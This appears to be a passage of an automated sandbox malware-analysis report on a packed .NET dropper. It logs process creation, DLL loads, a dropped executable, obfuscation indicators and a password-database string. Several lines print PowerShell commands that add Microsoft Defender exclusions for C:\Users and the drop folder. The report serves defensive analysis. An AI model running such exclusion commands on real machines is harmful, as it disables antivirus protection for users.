                Source: eXbhgU9.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\eXbhgU9.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1849551403.00000000042A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: eXbhgU9.exeReversingLabs: Detection: 13%
                Source: eXbhgU9.exeVirustotal: Detection: 22%
                Source: unknownProcess created: C:\Users\user\Desktop\eXbhgU9.exe "C:\Users\user\Desktop\eXbhgU9.exe"
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\FkSpRTrp\jyidkjkfhjawd.exe "C:\FkSpRTrp\jyidkjkfhjawd.exe"
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\FkSpRTrp\jyidkjkfhjawd.exe "C:\FkSpRTrp\jyidkjkfhjawd.exe" Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: version.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: wldp.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: profapi.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: webio.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: schannel.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: amsi.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: userenv.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: eXbhgU9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: eXbhgU9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: eXbhgU9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: eXbhgU9.exe

                Data Obfuscation

                barindex
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeUnpacked PE file: 7.2.jyidkjkfhjawd.exe.ab0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                Source: eXbhgU9.exeStatic PE information: 0xAAB116B5 [Thu Sep 30 01:13:25 2060 UTC]
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0444633D push eax; ret 2_2_04446351
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04443CAA push 8BD08B6Eh; iretd 2_2_04443CB3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_081273E8 push eax; retf 2_2_081273E9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03366348 push eax; ret 5_2_03366351
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AEF000 push eax; mov dword ptr [esp], 5B5A5908h7_2_00AEF005
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ABFE62 push 89FFFF80h; ret 7_2_00ABFE69
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_03223B9A push ebp; ret 7_2_03223BB6
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_03224676 push ecx; iretd 7_2_032246EB
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_0322452F push ecx; iretd 7_2_032246EB
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_032235B3 push ecx; iretd 7_2_032235BA
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_032235FF push ecx; iretd 7_2_03223606
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_03220077 push ds; retf 7_2_03220078
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name: entropy: 7.997518573935155
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name: entropy: 7.831462667091339
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name: entropy: 7.983042351633134
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name: entropy: 7.881268733146465
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name: .data entropy: 7.981738077290403
                Source: C:\Users\user\Desktop\eXbhgU9.exeFile created: C:\FkSpRTrp\jyidkjkfhjawd.exeJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
